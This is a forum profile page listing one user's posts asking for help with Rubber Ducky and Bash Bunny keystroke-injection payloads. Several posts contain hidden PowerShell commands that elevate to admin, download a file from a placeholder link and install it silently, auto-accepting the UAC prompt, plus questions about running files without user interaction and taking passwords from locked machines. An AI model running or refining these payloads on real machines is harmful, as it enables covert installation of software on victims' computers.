Jump to content

Soultouche

Active Members
  • Posts

    11
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

Soultouche's Achievements

Newbie

Newbie (1/14)

  1. RUN WIN powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''$DRIVE''').Name+'payloads\\$SWITCH_POSITION\s.msi') /qn" This is exactly what i have to do, but its not working because its not running as admin
  2. Hi, There is something i dont understand with the bash bunny... i dont know i feel like its too hard for my brain to understand how it works compared to the Rubber Ducky so i need some help I have this on a rubber ducky its pretty basic and does what i want: Starting an admin powershell Asking for admin and THEN running my command ( download a file output that file and run it quietly ) DELAY 1500 GUI r DELAY 1000 STRING Powershell -WindowStyle Hidden -Command "Start PowerShell -WindowStyle Hidden -Verb RunAs ""& "(New-Object System.Net.WebClient).DownloadFile('LINKHERE', '$env:temp\g.msi'); Start %temp%\g.msi /qn"" ENTER DELAY 1000 ALT o ALT y So How would be the best way to do that without requiring the download because the file will be on the Bash Bunny either inside or on the storage? THE POWERSHELL HAS TO BE ADMIN or the program wont install correctly. i cant get to open an admin powershell and then get the drive letter and execute my program all on one line and ask for approval before actually installing the program ( time saver ) Thanks Alot
  3. Well, i mean we can run a complete nmap scan and save the output on the bash bunny, i know its all inside, but i thought that starting from there, there could be a way to just run a program ( other than nmap on the linux that would... i dont know run a script or something ) we can also get passwords from a locked machine, so the bash bunny can interact with the machine without hid and save the information. if it can nmap why cant it run a Python or something from the inside ? Thanks for your info guys !
  4. let me explain myself, Would it be possible to plug in the bash bunny. and make it execute $SWITCH_POSITION\test.bat since its bash and people do pretty much like it with rndis ethernet attack / storage why couldnt it be possible to just execute a file on the bash bunny without the need of HID ? so no user interaction ? is that doable ? Thanks
  5. We can close this, i found why, when you type QUACK STRING you need to add " like : QUACK STRING "cmd"
  6. Hi, My problem is that when i tried : ATTACKMODE HID STORAGE DUCKY_LANG ca LED R B QUACK DELAY 1500 LED B QUACK GUI r LED G QUACK DELAY 1000 LED R FAST QUACK STRING Powershell -WindowStyle............insert the magic here QUACK ENTER LED R G B It stays blinking red fast... indefinitely tried a couple things but idk is it related to my language been bad ? because in the languages i do have all the languages...
×
×
  • Create New...